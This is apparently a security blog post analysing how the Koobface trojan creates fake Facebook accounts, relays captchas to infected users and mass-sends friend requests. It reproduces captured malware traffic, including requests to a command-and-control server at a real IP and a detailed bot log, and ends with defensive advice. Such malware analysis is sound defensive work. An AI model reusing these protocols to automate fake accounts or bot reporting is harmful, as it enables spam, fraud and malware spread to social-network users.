Tag Archive for 'friend request'

Dangerous friend requests on Facebook

While analyzing the Koobface trojan, I just made a interesting find. As mentioned in my post “Koobface – the social network trojan” from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: A valid account. The cybercriminal has two possiblities to obtain valid accounts:

  • Using some phishing tricks to steal credentials
  • Creating fake accounts

There are two reasons why most cybercriminals are trying to phish the credentials from users of social networking sites instead of creating fake accounts by their own:

  • Most of the time the register forms of the social networking sites are protected with a captcha
  • At the moment, there is no reliable method to break captchas

As described in my post about Koobface last year, the Koobface trojan is able to “break” captchas (to be correct, the trojan isn’t able to break captchas rather then it servs the captchas to the infected bots where the captchas will be solved by the users). By using this technique, he is able to create hundreds of faked accounts on social networks (per minute!).

Creating malicious Facebook accounts
To spread itself, the trojan creates spoofed Facebook accounts on which he will post malicious comments and sends messages with a link to a malicious sites. For those of you who are not familiar with Facebook: Before you can write a message or create a message at the pinboard of somebody, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages he has to get some friends. Don’t be afraid, but even that is no problem for Koobface: It is able to send friend requests to hundreds of Facebook members.

When you log into Facebook, you’re browser will save a cookie on your computer. In fact Koobface uses the Internet Exporer installed on a infected computer to log into Facebook. So what would happen when you are infected with Koobface and you would try to access *your* personal Facebook account?

Uuuh?!?! What’s that?

That’s not my account ?!?! But who is Anyeta Fecher?
The answer is simple: That’s an account which was created by Koobface. But how does that work? I will show you:

First of all the trojan sends a request to a zombie, calling the module grgen:

POST /.sys/?action=grgen&v=05 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

The zombie/proxy will return some information about the account which the infected bot should create:

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close

#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
[...]

Lets’ take a deeper look at this response: The response will instruct the bot to create a new account (SOFT|ADD) using a email adresse (LOGIN) and password (PASS). The email address which is used by the LOGIN parameter as well as the password is scrambled (so you won’t be able to log in with these credentials). The zombie will return some more parameters like birthday, Facebook groups which the malicious account should join etc. The bot will now start with the registrartion of the account. During the registration process, he will get a captcha from Facebook which he will send to the C&C server. As soon as the captcha is resolved, the C&C server will return it to the bot which can now finish the registration process.

On the next step, the trojan will send a log back to the C&C server with some information about the registration of the Facebook account:

POST /log.php?id=21963&soft=ADD&build=0017 HTTP/1.1
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: 61.235.117.83
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Content-Length: 3759

20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:38:53 ThreadID:1504 ProcID: 1516 IE VERSION=7.0.5730.10
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:38:53 ThreadID:1504 ProcID: 1516 get work domain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 create browser thread
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create google browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create main browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 getactivedomain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 check inet
20100109 16:38:53 ThreadID:1504 ProcID: 1516 inet ok
20100109 16:38:53 ThreadID:1504 ProcID: 1516 trying
20100109 16:38:53 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 valid domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 work domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 wait inet begin
20100109 16:38:54 ThreadID:1504 ProcID: 1516 Request params
20100109 16:38:54 ThreadID:1504 ProcID: 1516 #BLACKLABEL
20100109 16:38:54 ThreadID:1504 ProcID: 1516 SOFT|ADD
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
20100109 16:38:54 ThreadID:1504 ProcID: 1516 PASS|ci6h}r95df0
20100109 16:38:54 ThreadID:1504 ProcID: 1516 ID|21375
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-YEAR|1982
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-MONTH|7
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-DAY|16
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGS|1
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode
20100109 16:38:54 ThreadID:1504 ProcID: 1516 confirmer module start
20100109 16:38:54 ThreadID:1504 ProcID: 1516 checking login
20100109 16:38:54 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:39:08 ThreadID:1504 ProcID: 1516 fb logoff begin
20100109 16:39:13 ThreadID:1504 ProcID: 1516 logout link not found
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 fill login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 check persist
20100109 16:39:20 ThreadID:1504 ProcID: 1516 fill pass
20100109 16:39:22 ThreadID:1504 ProcID: 1516 try submit
20100109 16:39:22 ThreadID:1504 ProcID: 1516 click submit button
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:35 ThreadID:1504 ProcID: 1516 confirm acc start
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516 PLACES DUMP
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished

As you can see, the log is quite detailed (yeah, “click submit button” and “scan friend end” sounds funny…).
Now the trojan will start to “get some” friends. I suppose that the trojan will parse the member list of the group which he has received from the C&C server when he has requested the grgen module:

Let’s wait some minutes….. and then we will take another look at the malicious profile:

As you can see, the Koobface bot just sent out more than 1’000 friend requests on Facebook within a few minutes! But what suprised me much more is the fact, that all those people accepted the friend request. So I just ask myself why so much people accept friend requests from other people which they don’t even know?

Conclusion
Within a few minutes, more than 1’000 new friends were harvested by Koobface – all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its friends.

So what we have learned:

  • Please be careful with friend request from persons which you don’t know (this also applies to all other social networks like myspace, netlog, hi5 etc)
  • If you find a malicious profile, report it to the administrator of the social network (eg. by using the report button)
  • And last but not least: If you go to Facebook and you are logged in with a unknown profile, you are infected with Koobface….

Happy (and safe) social networking!




economics-recluse
Scene
Urgent!